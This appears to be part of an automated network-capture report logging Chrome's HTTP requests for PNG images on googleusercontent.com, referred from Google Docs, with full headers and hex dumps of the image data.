                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-arch: "x86"
                                                                                        sec-ch-ua-full-version: "117.0.5938.132"
                                                                                        sec-ch-ua-platform-version: "10.0.0"
                                                                                        sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                                        sec-ch-ua-bitness: "64"
                                                                                        sec-ch-ua-model: ""
                                                                                        sec-ch-ua-wow64: ?0
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                        X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiRys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: image
                                                                                        Referer: https://docs.google.com/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-18 01:10:09 UTC606INHTTP/1.1 200 OK
                                                                                        Content-Type: image/png
                                                                                        Vary: Origin
                                                                                        Access-Control-Allow-Credentials: true
                                                                                        Access-Control-Allow-Origin: https://docs.google.com
                                                                                        Timing-Allow-Origin: https://docs.google.com
                                                                                        Access-Control-Expose-Headers: Content-Length
                                                                                        ETag: "v0"
                                                                                        Expires: Thu, 19 Dec 2024 01:10:09 GMT
                                                                                        Cache-Control: public, max-age=86400, no-transform
                                                                                        Content-Disposition: inline;filename="unnamed.png"
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Date: Wed, 18 Dec 2024 01:10:09 GMT
                                                                                        Server: fife
                                                                                        Content-Length: 147977
                                                                                        X-XSS-Protection: 0
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close
                                                                                        2024-12-18 01:10:09 UTC784INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 06 40 00 00 04 95 08 02 00 00 00 7b 02 85 45 00 00 00 03 73 42 49 54 08 08 08 db e1 4f e0 00 00 00 92 7a 54 58 74 52 61 77 20 70 72 6f 66 69 6c 65 20 74 79 70 65 20 41 50 50 31 00 00 08 99 55 8e 4b 0a c3 30 0c 44 f7 3e 45 8e 30 fa 58 b6 8e 53 82 13 02 a5 09 b9 ff a2 72 ed 2e 32 83 18 31 88 87 d2 de 3e ed 3e d6 e5 ba cf ed 78 b7 b4 fc e4 9a d4 d5 f9 05 a0 62 88 01 21 50 4f 94 59 d9 48 f3 5a a0 b1 d0 ec 1b 1e ca 71 61 62 54 62 fe 2c c0 07 47 c7 8d 40 38 8c 6a ce bd 27 1e bd ae 4f 96 52 16 95 fe dd 64 8b 49 61 cb e1 16 fc 6a 5b d1 f4 05 ae 8a 2c f8 64 84 cf 84 00 00 20 00 49 44 41 54 78 9c ec dd 77 78 1d 57 9d ff f1 73 a6 dd aa 6e 75 4b 96 65 b9 f7 12 db b1 d3 9c 42 0a 21 24 84 0e 81 4d 80 25 cb 06 16 76
                                                                                        Data Ascii: PNGIHDR@{EsBITOzTXtRaw profile type APP1UK0D>E0XSr.21>>xb!POYHZqabTb,G@8j'ORdIaj[,d IDATxwxWsnuKeB!$M%v
                                                                                        2024-12-18 01:10:09 UTC1390INData Raw: 14 19 16 de b4 5e 8f 00 eb b8 e3 a4 26 6f 30 9c 58 c5 e3 09 d7 75 1d c7 19 ce a0 1d c7 15 42 38 8e 1a df 88 0c 0b 00 00 00 00 70 1a 1b 0e b0 34 cd 36 8c b8 ae eb 5e af d7 34 cd 29 0b ba 93 61 e1 4d eb b5 0d b0 8e 11 5d 4d b9 ca 75 dd 44 22 21 84 8a c7 13 4a a9 68 cc 71 6c 27 91 b0 7b 7b 63 91 88 7d b4 69 20 99 74 9b 9a 06 5c a5 c2 83 89 64 c2 89 c5 6d db 56 ae 4b 86 05 00 00 00 00 38 0d 29 61 98 5a 76 96 67 46 81 af 6a 76 ce bc 9a fc e2 62 7f 32 e9 f8 7c 96 65 79 0c c3 10 93 46 63 91 61 e1 cd 49 86 c3 e1 d7 62 bf 53 e6 53 d3 e5 59 4a 29 d7 75 5d d7 4d 26 13 a1 50 d4 75 55 57 f7 a0 9d 74 0f d7 87 fa 7a a3 fb 6a 7b 5d d7 b1 6d c7 30 34 29 85 ae 4b 21 84 1c fe 85 9f 59 00 00 00 00 c0 69 4e 29 e5 ba c2 71 5c db 16 35 35 f9 6b cf 28 ad a8 c8 ce cf f3 fb fd be
                                                                                        Data Ascii: ^&o0XuB8p46^4)aM]MuD"!Jhql'{{c}i t\dmVK8)aZvgFjvb2|eyFcaIbSSYJ)u]M&PuUWtzj{]m04)K!YiN)q\55k(
                                                                                        2024-12-18 01:10:09 UTC1390INData Raw: b6 7e 79 7e 20 6d 66 5f 32 1c 6e 38 d2 76 34 21 fd de 13 ed 84 26 87 fa a3 9b 1f dc 5e e4 57 c3 03 91 34 95 d8 d3 19 93 a7 67 86 e5 f5 07 2b 96 16 c7 f7 77 f9 8c d4 09 28 a5 9b b9 33 67 16 4c 39 00 0b 00 de d0 08 b0 00 00 00 00 fc bd 0c 8f b1 f7 fe e6 ae cb 67 96 8c 55 73 32 4b 67 65 15 97 69 6d cd 42 d7 c7 6f ad dc b8 ac 58 5c 19 4c ab 74 a5 06 7a 7b 1b 77 f4 19 d6 89 a7 4d 52 ca d8 50 fc e1 bb 76 d8 ee d8 22 8f 57 33 32 fc 35 84 d3 d0 3c 56 51 69 69 65 a2 a3 df 37 32 8c 4c 29 61 f8 b5 8a 25 79 be e3 34 05 80 37 a0 d3 f3 2f 23 00 00 00 00 64 14 4d b3 ba f7 ef 6e 49 a4 2f 2b 28 29 2d 2c ca 51 ce c4 59 84 6e c2 29 b8 a8 a4 3c d7 1a 0b 96 9c 64 77 53 df f6 56 d7 9c fc 80 a2 84 4a fb f7 d8 a4 94 1e 9f e1 f7 8f fe eb d3 8f 9b 5e a5 ef fc 55 d5 8f 3a e1 86 c7
                                                                                        Data Ascii: ~y~ mf_2n8v4!&^W4g+w(3gL9gUs2KgeimBoX\Ltz{wMRPv"W325<VQiie72L)a%y47/#dMnI/+()-,QYn)<dwSVJ^U:
                                                                                        2024-12-18 01:10:09 UTC1390INData Raw: 72 16 ae a8 59 33 df 1f e9 ec ee e8 4d d8 62 74 60 91 52 42 18 8b cf 5e 72 dd b5 1b ce 5d 5e 90 17 9c 3c 0b 53 7a 7c be 99 73 ca cf da 50 91 ab c2 07 0e 0c 24 e5 58 5b 57 b3 16 9f b3 fc 13 ff b4 61 e3 e2 fc ec c0 e4 01 13 d2 e3 f7 96 d7 54 6c 3a af ca 1f ed 3d 5c 1f 4e a4 8d 00 73 93 76 d6 ac 92 f7 7f ec a2 f7 9e 5f 51 92 6b 4d bc f7 42 18 1e 4f c9 ac b2 b5 67 54 64 39 e1 c3 8d e1 84 3b 36 18 4a b9 4a 58 e6 ea b7 ac fa d8 b5 67 ac ae ce 4e 8b 47 85 66 98 25 55 e5 6b 57 95 78 e2 4e e9 e2 bc dc d1 7b 17 1d e8 df bf bd e1 60 b7 1c 3e 90 72 5d c7 93 75 ce a5 67 7c e4 1f ce 58 56 15 f4 9a e3 4e db f0 f9 ca ab cb d7 9f 51 9e af 45 9b 9a c2 43 09 32 2c e0 f5 46 0d 2c 00 00 00 00 27 83 14 42 68 bb 5e ea 8c a4 2f f4 e7 6e a8 f6 58 32 35 8d 4c 25 9c c0 ca ca 19 d9
                                                                                        Data Ascii: rY3Mbt`RB^r]^<Sz|sP$X[WaTl:=\Nsv_QkMBOgTd9;6JJXgNGf%UkWxN{`>r]ug|XVNQEC2,F,'Bh^/nX25L%
                                                                                        2024-12-18 01:10:09 UTC1390INData Raw: c7 17 5f da d1 db dc 19 49 fa 3c e5 15 f9 ab d6 2f be f2 92 aa 5c 4b 0d 0e 44 fa 7b 07 5b 8f f6 26 75 29 85 12 c2 8d 0c 95 bd 75 53 c9 58 bc 64 c7 eb 76 1d b8 e7 ee bd db 0e 0f 45 7d fe d5 2b 67 5d f9 c1 f5 4b c6 06 85 c9 bc 32 af 2f 5b aa 2e 21 84 72 bc 81 f9 2b aa 6a 8a d3 c7 d5 25 b6 3f b2 fd f1 e7 9b 77 1f 18 b0 03 39 6b 37 56 5d b8 69 de bc 8a e0 d4 37 44 b9 91 78 d9 95 6f 9f 9d 96 5e b9 5d f5 47 9f 78 78 ef d3 cf 77 b5 08 6b cd ba ea 8b 2f 59 be 7a 74 bd 11 9c b1 6e 6d e5 96 7d e1 96 7e 77 9a 40 0c c0 c9 47 80 05 00 00 00 e0 e4 90 9a 48 86 ed 23 bb 3b 07 96 67 8d cd 21 f3 e4 6f 38 d7 78 ec 5e c7 f2 2a 3b 91 35 a7 b8 a8 20 6d 7a a0 1b 09 bd f0 70 77 d0 6b 26 86 02 9b 56 56 54 95 8c 65 08 4e ac ef a9 3f 3c f7 87 17 fb 94 a9 7b b3 0d 15 09 3d ff 50 ff
                                                                                        Data Ascii: _I</\KD{[&u)uSXdvE}+g]K2/[.!r+j%?w9k7V]i7Dxo^]Gxxwk/Yztnm}~w@GH#;g!o8x^*;5 mzpwk&VVTeN?<{=P
                                                                                        2024-12-18 01:10:09 UTC1390INData Raw: f8 7d eb cf 2d c8 4b e5 57 f1 58 4f 5f 4f cc 32 22 d1 a4 3b a9 b0 b1 72 94 b7 c6 9f eb 1d 3b b0 63 27 fa 3b 9a 6a 9b dc e2 ac d1 77 41 3a 2a 37 5e db 13 5e 5d 38 7a 1d 65 56 76 a5 cf bb 4b 0c 25 dd f6 9d 2d c9 99 35 23 27 2c 2d ff fc b5 cb bf b0 7a 69 7c 68 a8 e1 50 fb ae 17 f6 3f fe 74 7b 5b 54 0b 06 0c bf 57 d3 75 99 1a 81 a4 19 b2 79 df 60 67 67 ac 26 6f 74 a4 98 ee 5d 76 ee ea 85 67 2e 8f 0c 0c 35 35 b4 bf f4 52 fd 83 4f b5 85 22 2a 18 34 fc 3e 4d d7 c6 0f 20 93 52 ba 4e a8 6b a0 b7 5d 25 93 4e 2c e6 26 6d 95 88 b9 05 35 45 e7 5f b6 60 ed d2 92 ea 59 f9 53 8f 37 53 9a d7 3b 23 2b bd f2 fb e0 e0 63 ed 09 2b fd ba 48 cd ab 06 f6 75 84 37 2e cc 33 26 3e 04 bb 49 bb b8 aa c0 9b d6 19 37 12 8e 35 ec 8c 36 15 25 87 af 82 72 55 22 28 5b da a2 22 15 60 09 a3
                                                                                        Data Ascii: }-KWXO_O2";r;c';jwA:*7^^]8zeVvK%-5#',-zi|hP?t{[TWuy`gg&ot]vg.55RO"*4>M RNk]%N,&m5E_`YS7S;#+c+Hu7.3&>I756%rU"(["`
                                                                                        2024-12-18 01:10:09 UTC1390INData Raw: 66 e8 d9 41 dd 78 b5 25 dc 85 88 84 5c a9 49 31 e8 84 1a c2 91 f5 b9 fe d1 33 48 1d cb 4e c6 bb 5a da 5d 43 93 d3 05 58 9a 74 86 1c c7 1d bb 1a 89 a1 81 a7 7f 7f cf cd 8f a8 5c ef 31 fa 23 fd 39 a6 6f f4 b5 89 a6 c7 54 c9 e8 b3 f7 be fc f0 9d 76 76 71 d1 99 67 96 cd a9 ca 2b 2e b0 bc be 40 7e 41 76 6e 76 5a 96 15 9c 71 f9 d5 b3 1f fa 41 bd 37 6b 64 99 e1 b5 66 a8 81 a7 ef 7e f9 a1 df 3b 81 59 45 e7 ae 9d 39 67 66 56 7e ae cf 1f f0 e7 17 64 e5 67 9b a9 4e 04 8a 8a 56 af 9f bd 6d c7 de 2e d7 2d da b8 ec dd e7 8d a5 57 89 c1 50 ed cb 07 1f 7d b2 ee 85 7d 83 b6 2b 35 4d ae be 66 ee 94 bd 97 d2 b5 dd 48 62 ac ee bc 30 72 b2 67 e9 5a bb 1a 17 7e 26 13 72 59 be 67 f2 14 51 21 a4 26 07 13 c9 b4 08 d4 4d d6 6f df fb 95 ff dc e9 14 18 c7 b8 c5 ba a5 e7 06 5f fd 6b
                                                                                        Data Ascii: fAx%\I13HNZ]CXt\1#9oTvvqg+.@~AvnvZqA7kdf~;YE9gfV~dgNVm.-WP}}+5MfHb0rgZ~&rYgQ!&Mo_k
                                                                                        2024-12-18 01:10:09 UTC1390INData Raw: f9 05 23 79 90 e1 9d 77 c6 ea 1b 3e 93 f3 f0 43 b5 4f 6d 8d 14 2d aa b8 e1 9f 96 5e b0 a6 d8 94 c2 49 3a c9 64 32 19 1f 7a e9 81 1d 77 3f d4 3c 68 9d 60 84 25 35 d1 df 63 77 74 46 45 f9 f8 00 4b b9 7d 6d 1d f5 96 96 27 a4 d4 c2 d1 78 42 b9 93 cb 84 49 5f 70 f0 91 27 3a 37 cc cf 2b b0 46 ae 65 5e c5 cc 77 5c 7b 76 f1 a3 b5 7f 7d a8 a9 c9 1b 7c db 55 6b af be 72 5e 99 4f 13 ca 4d 24 ec 0d 49 b7 e7 f0 81 df dd b9 77 5f 7d 64 c3 3f 5e fc e1 35 d9 9a 69 7a 2c dd d0 a5 5b 53 50 5a 5e b2 f9 e1 c3 8f 6f 6e e9 16 5a 7e 55 e9 bb 6e 98 b7 e9 cc 22 5f da f1 a2 3d 3d 7b a4 d0 ac dc 4d 57 ae ba f0 cc 42 bf 61 78 2c c3 d0 85 98 97 ff cd dc bc e7 1e 3f f0 ec b6 9e a6 90 51 31 bb f0 7d ff be f1 a2 c5 39 69 d7 c4 09 f7 c6 da 9b 95 ae a5 c6 7f 0d d3 8a 66 57 5d 7e 4d 24 f2
                                                                                        Data Ascii: #yw>COm-^I:d2zw?<h`%5cwtFEK}m'xBI_p':7+Fe^w\{v}|Ukr^OM$Iw_}d?^5iz,[SPZ^onZ~Un"_=={MWBax,?Q1}9ifW]~M$
                                                                                        2024-12-18 01:10:09 UTC1390INData Raw: 10 78 05 53 cb 94 52 41 df c2 55 35 f3 f3 c7 86 6a f5 ec 3f f8 e4 be 98 ae 4b a9 54 3c 37 7b e1 fc b2 e2 e0 58 6e 17 6b 6b f9 c5 83 47 85 5f 97 42 24 13 ce d2 0d f3 e6 ce cc 4a 1d 29 da d7 fb f2 63 4d 7d 5e 4d 13 42 48 e9 f1 45 36 ff df 01 59 55 36 ab c8 d2 84 d4 a6 3a d9 68 38 bc ed b1 97 6f bd b5 b6 4d 19 a6 26 84 90 ba 26 da f6 1f d9 d3 68 97 57 65 07 bd ba 9c a2 dd e8 85 1a 1a 78 fa cf 9b 6f ba bb 3d cb af 6b 52 08 29 0d cb ae dd 72 a4 3e 26 4a 4b b2 02 1e 5d 9b 7c 95 52 c7 1d 0c 3d fb a7 cd 37 ff 4f 8b 27 77 38 1b 92 5e 6f e4 fe fb fb 96 6e 28 9b 11 30 26 1c d2 75 9c 68 b8 ff c1 5f 3d fc 70 4f e1 fa 85 a3 75 ac a4 e5 75 db 5e d8 3b 90 54 52 4a a1 e9 da 40 43 db 9e f6 58 49 65 41 7e d0 1c ff b6 41 65 c7 63 0d db 77 fe f2 b0 5a 5b 95 eb 19 bd ab 89 a1
                                                                                        Data Ascii: xSRAU5j?KT<7{XnkkG_B$J)cM}^MBHE6YU6:h8oM&&hWexo=kR)r>&JK]|R=7O'w8^on(0&uh_=pOuu^;TRJ@CXIeA~AecwZ[
                                                                                        2024-12-18 01:10:09 UTC1390INData Raw: 2c 19 0e 45 63 f1 a1 fa ad 07 fe 6f 73 5b 63 6b 5c 0f 78 ca aa 4a de 71 45 f5 59 73 73 53 05 e8 55 32 d1 d5 da d1 60 68 93 df 91 09 20 33 11 60 01 00 00 00 00 4e 5b 52 3a bd c9 de 23 03 4e 8d d7 b0 cc 2c cb cc ca f6 0b 51 50 51 9a bf e8 ac 58 d2 71 a5 d4 0c cb 93 9d e3 0f 7a d3 66 5f 0e 0e ec 7d ba d9 f1 c8 93 35 96 0e c0 6b 8d 00 0b 00 00 00 00 70 da 92 52 8b 0f ee d9 7e b0 76 49 de 92 92 b1 01 55 66 20 58 16 98 6e fa 65 72 d7 c3 2f 3d 56 ef 78 bd d4 62 07 4e 1b fa ca 55 57 9d ea 3e 00 00 00 00 00 70 82 34 4d 86 3b 7b f7 b7 44 8a 67 15 95 64 1f 6f 94 86 1b df fc 9b fb 7e fe 48 9f b4 b4 57 59 72 1f c0 a9 c4 5b 08 01 00 00 00 00 a7 3d 27 69 f7 77 eb 55 1b e7 bc fd a2 d9 f3 aa f3 f2 bc a6 69 0a a5 84 10 42 4a 65 27 92 7d 9d a1 bd 2f ee fb 9f df d5 45 72 3d
                                                                                        Data Ascii: ,Ecos[ck\xJqEYssSU2`h 3`N[R:#N,QPQXqzf_}5kpR~vIUf Xner/=VxbNUW>p4M;{Dgdo~HWYr[='iwUiBJe'}/Er=


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.2.1649720142.250.181.654436728C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-18 01:10:12 UTC619OUTGET /drawingsz/AHiSRb2vRX9yRkhsvHGfazZ72MIvhHTEE29fzvFIJ2wLbLb48Na1ZuKYqByE7N05I4x14kPzvPGpPC-E1sHLmtMPSMYYZFjYQ1a2lQEOxRYu2NvG2foDaSN72Eozfhv4l2hEccw?key=psfCeKuvwgTVf-bOGgtgC0jY HTTP/1.1
                                                                                        Host: lh7-rt.googleusercontent.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-18 01:10:13 UTC522INHTTP/1.1 200 OK
                                                                                        Content-Type: image/png
                                                                                        Vary: Origin
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Timing-Allow-Origin: *
                                                                                        Access-Control-Expose-Headers: Content-Length
                                                                                        ETag: "v0"
                                                                                        Expires: Thu, 19 Dec 2024 01:10:13 GMT
                                                                                        Cache-Control: public, max-age=86400, no-transform
                                                                                        Content-Disposition: inline;filename="unnamed.png"
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Date: Wed, 18 Dec 2024 01:10:13 GMT
                                                                                        Server: fife
                                                                                        Content-Length: 147977
                                                                                        X-XSS-Protection: 0
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close
                                                                                        2024-12-18 01:10:13 UTC868INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 06 40 00 00 04 95 08 02 00 00 00 7b 02 85 45 00 00 00 03 73 42 49 54 08 08 08 db e1 4f e0 00 00 00 92 7a 54 58 74 52 61 77 20 70 72 6f 66 69 6c 65 20 74 79 70 65 20 41 50 50 31 00 00 08 99 55 8e 4b 0a c3 30 0c 44 f7 3e 45 8e 30 fa 58 b6 8e 53 82 13 02 a5 09 b9 ff a2 72 ed 2e 32 83 18 31 88 87 d2 de 3e ed 3e d6 e5 ba cf ed 78 b7 b4 fc e4 9a d4 d5 f9 05 a0 62 88 01 21 50 4f 94 59 d9 48 f3 5a a0 b1 d0 ec 1b 1e ca 71 61 62 54 62 fe 2c c0 07 47 c7 8d 40 38 8c 6a ce bd 27 1e bd ae 4f 96 52 16 95 fe dd 64 8b 49 61 cb e1 16 fc 6a 5b d1 f4 05 ae 8a 2c f8 64 84 cf 84 00 00 20 00 49 44 41 54 78 9c ec dd 77 78 1d 57 9d ff f1 73 a6 dd aa 6e 75 4b 96 65 b9 f7 12 db b1 d3 9c 42 0a 21 24 84 0e 81 4d 80 25 cb 06 16 76
                                                                                        Data Ascii: PNGIHDR@{EsBITOzTXtRaw profile type APP1UK0D>E0XSr.21>>xb!POYHZqabTb,G@8j'ORdIaj[,d IDATxwxWsnuKeB!$M%v
                                                                                        2024-12-18 01:10:13 UTC1390INData Raw: 13 4a a9 68 cc 71 6c 27 91 b0 7b 7b 63 91 88 7d b4 69 20 99 74 9b 9a 06 5c a5 c2 83 89 64 c2 89 c5 6d db 56 ae 4b 86 05 00 00 00 00 38 0d 29 61 98 5a 76 96 67 46 81 af 6a 76 ce bc 9a fc e2 62 7f 32 e9 f8 7c 96 65 79 0c c3 10 93 46 63 91 61 e1 cd 49 86 c3 e1 d7 62 bf 53 e6 53 d3 e5 59 4a 29 d7 75 5d d7 4d 26 13 a1 50 d4 75 55 57 f7 a0 9d 74 0f d7 87 fa 7a a3 fb 6a 7b 5d d7 b1 6d c7 30 34 29 85 ae 4b 21 84 1c fe 85 9f 59 00 00 00 00 c0 69 4e 29 e5 ba c2 71 5c db 16 35 35 f9 6b cf 28 ad a8 c8 ce cf f3 fb fd be e1 a1 58 a9 2d 53 7f e6 79 18 6f 36 32 1a 8d 9c c4 dd bd b2 dc 6a 6c 81 52 4a 29 37 91 48 38 8e eb 38 f6 d0 50 f2 85 17 9b 06 c3 89 17 b7 76 68 52 44 a3 09 5d 97 ba ae f1 83 09 00 00 00 00 78 33 b0 6d 57 08 6d fe fc fc 0b cf af 2e 2f cf f2 7a bd 1e 8f
                                                                                        Data Ascii: Jhql'{{c}i t\dmVK8)aZvgFjvb2|eyFcaIbSSYJ)u]M&PuUWtzj{]m04)K!YiN)q\55k(X-Syo62jlRJ)7H88PvhRD]x3mWm./z
                                                                                        2024-12-18 01:10:13 UTC1390INData Raw: ae cb 67 96 8c 55 73 32 4b 67 65 15 97 69 6d cd 42 d7 c7 6f ad dc b8 ac 58 5c 19 4c ab 74 a5 06 7a 7b 1b 77 f4 19 d6 89 a7 4d 52 ca d8 50 fc e1 bb 76 d8 ee d8 22 8f 57 33 32 fc 35 84 d3 d0 3c 56 51 69 69 65 a2 a3 df 37 32 8c 4c 29 61 f8 b5 8a 25 79 be e3 34 05 80 37 a0 d3 f3 2f 23 00 00 00 00 64 14 4d b3 ba f7 ef 6e 49 a4 2f 2b 28 29 2d 2c ca 51 ce c4 59 84 6e c2 29 b8 a8 a4 3c d7 1a 0b 96 9c 64 77 53 df f6 56 d7 9c fc 80 a2 84 4a fb f7 d8 a4 94 1e 9f e1 f7 8f fe eb d3 8f 9b 5e a5 ef fc 55 d5 8f 3a e1 86 c7 16 8b 8f 96 c4 92 46 5e 51 d6 82 59 22 95 c7 29 a5 fc 96 6f 51 59 f0 84 77 7e 82 67 7a b2 ae d2 2b b8 83 c7 6e 7e 62 6d 5f e1 f2 63 1f 1d c0 29 c7 08 2c 00 00 00 00 7f 3f e9 cb b2 ef db dc 71 fe 3f 54 8c 0d b7 ca ca 5e 52 12 d8 2a fb 42 e3 ff e6 3c 1e
                                                                                        Data Ascii: gUs2KgeimBoX\Ltz{wMRPv"W325<VQiie72L)a%y47/#dMnI/+()-,QYn)<dwSVJ^U:F^QY")oQYw~gz+n~bm_c),?q?T^R*B<
                                                                                        2024-12-18 01:10:13 UTC1390INData Raw: 1f ed 3d 5c 1f 4e a4 8d 00 73 93 76 d6 ac 92 f7 7f ec a2 f7 9e 5f 51 92 6b 4d bc f7 42 18 1e 4f c9 ac b2 b5 67 54 64 39 e1 c3 8d e1 84 3b 36 18 4a b9 4a 58 e6 ea b7 ac fa d8 b5 67 ac ae ce 4e 8b 47 85 66 98 25 55 e5 6b 57 95 78 e2 4e e9 e2 bc dc d1 7b 17 1d e8 df bf bd e1 60 b7 1c 3e 90 72 5d c7 93 75 ce a5 67 7c e4 1f ce 58 56 15 f4 9a e3 4e db f0 f9 ca ab cb d7 9f 51 9e af 45 9b 9a c2 43 09 32 2c e0 f5 46 0d 2c 00 00 00 00 27 83 14 42 68 bb 5e ea 8c a4 2f f4 e7 6e a8 f6 58 32 35 8d 4c 25 9c c0 ca ca 19 d9 81 b4 f9 83 f1 a1 03 5b ea b2 3c ba 72 5d d7 9f 75 de db d7 ff cb 47 57 55 e7 1e eb 51 45 0b e4 9c fb 8e 73 ae bd ba ba 3c 57 4b 38 af b4 83 4e 42 ce 98 35 f3 7d 1f 5c bb 69 45 5a 62 34 d5 99 54 2e 5f f1 c9 6b 97 cc 09 8a e4 c8 d4 39 15 4f 58 2b 2e 5a
                                                                                        Data Ascii: =\Nsv_QkMBOgTd9;6JJXgNGf%UkWxN{`>r]ug|XVNQEC2,F,'Bh^/nX25L%[<r]uGWUQEs<WK8NB5}\iEZb4T._k9OX+.Z
                                                                                        2024-12-18 01:10:13 UTC1390INData Raw: bc 81 f9 2b aa 6a 8a d3 c7 d5 25 b6 3f b2 fd f1 e7 9b 77 1f 18 b0 03 39 6b 37 56 5d b8 69 de bc 8a e0 d4 37 44 b9 91 78 d9 95 6f 9f 9d 96 5e b9 5d f5 47 9f 78 78 ef d3 cf 77 b5 08 6b cd ba ea 8b 2f 59 be 7a 74 bd 11 9c b1 6e 6d e5 96 7d e1 96 7e 77 9a 40 0c c0 c9 47 80 05 00 00 00 e0 e4 90 9a 48 86 ed 23 bb 3b 07 96 67 8d cd 21 f3 e4 6f 38 d7 78 ec 5e c7 f2 2a 3b 91 35 a7 b8 a8 20 6d 7a a0 1b 09 bd f0 70 77 d0 6b 26 86 02 9b 56 56 54 95 8c 65 08 4e ac ef a9 3f 3c f7 87 17 fb 94 a9 7b b3 0d 15 09 3d ff 50 ff 9e fa 81 2f 7c ee fc 59 a3 6f 2b b4 f2 0b 97 2e 9e b1 6d 5f a8 23 79 ac c2 e9 ca 55 a2 20 50 bd 64 66 69 5a cd f6 fe 86 3d b7 de be 37 64 98 1e 9f e9 11 d1 1d 9b f7 b9 65 f9 33 4b 6a 72 0c 3b 1c 8a b4 77 f4 35 d4 77 b4 45 a5 66 bb de 33 66 2e 2a cf 4a
                                                                                        Data Ascii: +j%?w9k7V]i7Dxo^]Gxxwk/Yztnm}~w@GH#;g!o8x^*;5 mzpwk&VVTeN?<{=P/|Yo+.m_#yU PdfiZ=7de3Kjr;w5wEf3f.*J
                                                                                        2024-12-18 01:10:13 UTC1390INData Raw: 7c 68 a8 e1 50 fb ae 17 f6 3f fe 74 7b 5b 54 0b 06 0c bf 57 d3 75 99 1a 81 a4 19 b2 79 df 60 67 67 ac 26 6f 74 a4 98 ee 5d 76 ee ea 85 67 2e 8f 0c 0c 35 35 b4 bf f4 52 fd 83 4f b5 85 22 2a 18 34 fc 3e 4d d7 c6 0f 20 93 52 ba 4e a8 6b a0 b7 5d 25 93 4e 2c e6 26 6d 95 88 b9 05 35 45 e7 5f b6 60 ed d2 92 ea 59 f9 53 8f 37 53 9a d7 3b 23 2b bd f2 fb e0 e0 63 ed 09 2b fd ba 48 cd ab 06 f6 75 84 37 2e cc 33 26 3e 04 bb 49 bb b8 aa c0 9b d6 19 37 12 8e 35 ec 8c 36 15 25 87 af 82 72 55 22 28 5b da a2 22 15 60 09 a3 b0 ca d4 0d e5 ba 92 04 0b 78 7d 10 60 01 00 00 00 38 69 a4 26 9d 8e a1 e6 da 8e fe a5 39 79 a9 d0 47 e6 9d fb 21 f3 f1 bf fa cb 8a e7 94 e6 a4 6d 1d eb 79 e0 c1 78 20 d7 70 93 22 df 6f 04 3c e9 8f 27 f1 f6 cd 09 cb 9a f4 42 38 a9 a9 44 28 6e a7 3d ca
                                                                                        Data Ascii: |hP?t{[TWuy`gg&ot]vg.55RO"*4>M RNk]%N,&m5E_`YS7S;#+c+Hu7.3&>I756%rU"(["`x}`8i&9yG!myx p"o<'B8D(n=
                                                                                        2024-12-18 01:10:13 UTC1390INData Raw: d1 99 67 96 cd a9 ca 2b 2e b0 bc be 40 7e 41 76 6e 76 5a 96 15 9c 71 f9 d5 b3 1f fa 41 bd 37 6b 64 99 e1 b5 66 a8 81 a7 ef 7e f9 a1 df 3b 81 59 45 e7 ae 9d 39 67 66 56 7e ae cf 1f f0 e7 17 64 e5 67 9b a9 4e 04 8a 8a 56 af 9f bd 6d c7 de 2e d7 2d da b8 ec dd e7 8d a5 57 89 c1 50 ed cb 07 1f 7d b2 ee 85 7d 83 b6 2b 35 4d ae be 66 ee 94 bd 97 d2 b5 dd 48 62 ac ee bc 30 72 b2 67 e9 5a bb 1a 17 7e 26 13 72 59 be 67 f2 14 51 21 a4 26 07 13 c9 b4 08 d4 4d d6 6f df fb 95 ff dc e9 14 18 c7 b8 c5 ba a5 e7 06 5f fd 6b 26 01 9c 28 02 2c 00 00 00 00 27 97 34 ad f8 be 23 bd 9d fd 89 fc e2 91 22 56 9a ee a9 5c 56 94 56 d1 4a 35 ef 69 ea 18 4a 6a 52 0a 21 a4 2e 23 47 22 7d dd 51 67 a6 67 34 74 90 95 2b 17 cc bf e3 b9 76 e5 19 0b 3c 84 1a ea 11 97 5e 58 92 3e 8e ab af a3
                                                                                        Data Ascii: g+.@~AvnvZqA7kdf~;YE9gfV~dgNVm.-WP}}+5MfHb0rgZ~&rYgQ!&Mo_k&(,'4#"V\VVJ5iJjR!.#G"}Qgg4t+v<^X>
